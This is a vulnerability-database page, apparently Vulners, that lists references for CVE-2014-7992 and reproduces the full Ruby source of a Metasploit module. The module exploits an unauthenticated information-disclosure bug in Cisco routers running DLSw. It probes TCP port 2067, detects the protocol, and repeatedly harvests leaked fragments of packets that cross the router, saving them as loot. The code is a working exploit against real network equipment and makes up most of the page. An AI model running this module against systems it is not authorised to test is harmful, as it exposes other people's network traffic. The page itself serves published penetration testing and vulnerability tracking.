Lucene search
+L

Cisco DLSw Information Disclosure Scanner

🗓️ 18 Nov 2014 03:35:54Reported by Tate Hansen, John McLeod, Kyle RaineyType 
metasploit
 metasploit
🔗 www.rapid7.com👁 37 Views

This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2014-7992
29 May 201815:50
circl
Cisco
Cisco IOS Software DLSw Information Disclosure Vulnerability
18 Nov 201419:13
cisco
CVE
CVE-2014-7992
18 Nov 201401:00
cve
Cvelist
CVE-2014-7992
18 Nov 201401:00
cvelist
NVD
CVE-2014-7992
18 Nov 201401:59
nvd
Packet Storm
Cisco DLSw Information Disclosure Scanner
31 Aug 202400:00
packetstorm
Prion
Design/Logic Flaw
18 Nov 201401:59
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'socket'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'           => 'Cisco DLSw Information Disclosure Scanner',
      'Description'    => %q(
        This module implements the DLSw information disclosure retrieval. There
        is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains
        that allows an unauthenticated remote attacker to retrieve the partial
        contents of packets traversing a Cisco router with DLSw configured
        and active.
      ),
      'Author'         => [
        'Tate Hansen', # Vulnerability discovery
        'John McLeod', # Vulnerability discovery
        'Kyle Rainey' # Built lab to recreate vulnerability and help test
      ],
      'References'     =>
        [
          ['CVE', '2014-7992'],
          ['URL', 'https://github.com/tt5555/dlsw_exploit']
        ],
      'DisclosureDate' => 'Nov 17 2014',
      'License'        => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(2067),
        OptInt.new('LEAK_AMOUNT', [true, 'The number of bytes to store before shutting down.', 1024])
      ])
  end

  def get_response(size = 72)
    connect
    response = sock.get_once(size)
    disconnect
    response
  end

  # Called when using check
  def check_host(_ip)
    print_status("Checking for DLSw information disclosure (CVE-2014-7992)")
    response = get_response

    if response.blank?
      vprint_status("No response")
      Exploit::CheckCode::Safe
    elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48"
      vprint_good("Detected DLSw protocol")
      report_service(
        host: rhost,
        port: rport,
        proto: 'tcp',
        name: 'dlsw'
      )
      # TODO: check that response has something that truly indicates it is vulnerable
      # and not simply that it responded
      unless response[18..72].scan(/\x00/).length == 54
        print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes")
        report_vuln(
          host: rhost,
          port: rport,
          name: name,
          refs: references,
          info: "Module #{fullname} collected #{response.length} bytes"
        )
        Exploit::CheckCode::Vulnerable
      end
    else
      vprint_status("#{response.size}-byte response didn't contain any leaked data")
      Exploit::CheckCode::Safe
    end
  end

  # Main method
  def run_host(ip)
    return unless check_host(ip) == Exploit::CheckCode::Vulnerable

    dlsw_data = ''
    until dlsw_data.length > datastore['LEAK_AMOUNT']
      response = get_response
      dlsw_data << response[18..72] unless response.blank?
    end
    loot_and_report(dlsw_data)
  end

  def loot_and_report(dlsw_leak)
    path = store_loot(
      'dlsw.packet.contents',
      'application/octet-stream',
      rhost,
      dlsw_leak,
      'DLSw_leaked_data',
      'DLSw packet memory leak'
    )
    print_status("DLSw leaked data stored in #{path}")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation